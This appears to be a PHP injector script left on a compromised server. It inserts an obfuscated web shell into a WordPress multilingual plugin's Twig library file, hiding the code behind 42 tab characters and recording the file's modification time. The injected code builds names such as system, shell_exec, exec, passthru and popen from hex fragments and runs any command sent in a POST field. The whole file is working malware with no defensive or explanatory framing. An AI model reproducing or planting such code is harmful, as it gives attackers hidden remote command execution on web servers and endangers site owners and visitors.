File: //tmp/.class
<?php $path = '/home/batigun/public_html/wp-content/plugins/sitepress-multilingual-cms/vendor/twig/twig/lib/Twig/Node/Expression/NullCoalesce.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24data_chunk1%20%3D%20%27973%27%3B%24data_chunk2%20%3D%20%27746%27%3B%24data_chunk3%20%3D%20%2756d%27%3B%24data_chunk4%20%3D%20%27736%27%3B%24data_chunk5%20%3D%20%27865%27%3B%24data_chunk6%20%3D%20%27c5f%27%3B%24data_chunk7%20%3D%20%27657%27%3B%24data_chunk8%20%3D%20%27737%27%3B%24data_chunk9%20%3D%20%2716d%27%3B%24data_chunk10%20%3D%20%276f6%27%3B%24data_chunk11%20%3D%20%27e74%27%3B%24data_chunk12%20%3D%20%276f7%27%3B%24data_chunk13%20%3D%20%27f64%27%3B%24data_chunk14%20%3D%20%27756%27%3B%24data_chunk15%20%3D%20%27c65%27%3B%24data_chunk16%20%3D%20%275f6%27%3B%24data_chunk17%20%3D%20%27472%27%3B%24buffer_cache1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27.%24data_chunk1.%24data_chunk2.%24data_chunk3%29%3B%24buffer_cache2%20%3D%20pack%28%22H%2A%22%2C%20%24data_chunk4.%24data_chunk5.%276c6%27.%24data_chunk6.%24data_chunk7.%24data_chunk5%29%3B%24buffer_cache3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27.%27865%27%29%3B%24buffer_cache4%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27173%27.%24data_chunk8.%27468%27.%27727%27%29%3B%24buffer_cache5%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27f70%27.%27656%27%29%3B%24buffer_cache6%20%3D%20pack%28%22H%2A%22%2C%20%24data_chunk8.%27472%27.%27656%27.%24data_chunk9.%275f6%27.%27765%27.%27745%27.%27f63%27.%24data_chunk10.%24data_chunk11.%27656%27.%24data_chunk11%29%3B%24buffer_cache7%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%2736c%27.%24data_chunk12.%27365%27%29%3B%24module_controller%20%3D%20pack%28%22H%2A%22%2C%20%276d6%27.%24data_chunk13.%24data_chunk14.%24data_chunk15.%24data_chunk16.%2736f%27.%276e7%27.%24data_chunk17.%276f6%27.%27c6c%27.%27657%27%29%3Bif%28isset%28%24_POST%5B%24module_controller%5D%29%29%7B%24module_controller%3Dpack%28%22H%2A%22%2C%24_POST%5B%24module_controller%5D%29%3Bif%28function_exists%28%24buffer_cache1%29%29%7B%24buffer_cache1%28%24module_controller%29%3B%7Delseif%28function_exists%28%24buffer_cache2%29%29%7Bprint%20%24buffer_cache2%28%24module_controller%29%3B%7Delseif%28function_exists%28%24buffer_cache3%29%29%7B%24buffer_cache3%28%24module_controller%2C%24element_item%29%3Bprint%20join%28%22%5Cn%22%2C%24element_item%29%3B%7Delseif%28function_exists%28%24buffer_cache4%29%29%7B%24buffer_cache4%28%24module_controller%29%3B%7Delseif%28function_exists%28%24buffer_cache5%29%26%26function_exists%28%24buffer_cache6%29%26%26function_exists%28%24buffer_cache7%29%29%7B%24itm_desc%3D%24buffer_cache5%28%24module_controller%2C%22r%22%29%3Bif%28%24itm_desc%29%7B%24ent_dat%3D%24buffer_cache6%28%24itm_desc%29%3B%24buffer_cache7%28%24itm_desc%29%3Bprint%20%24ent_dat%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');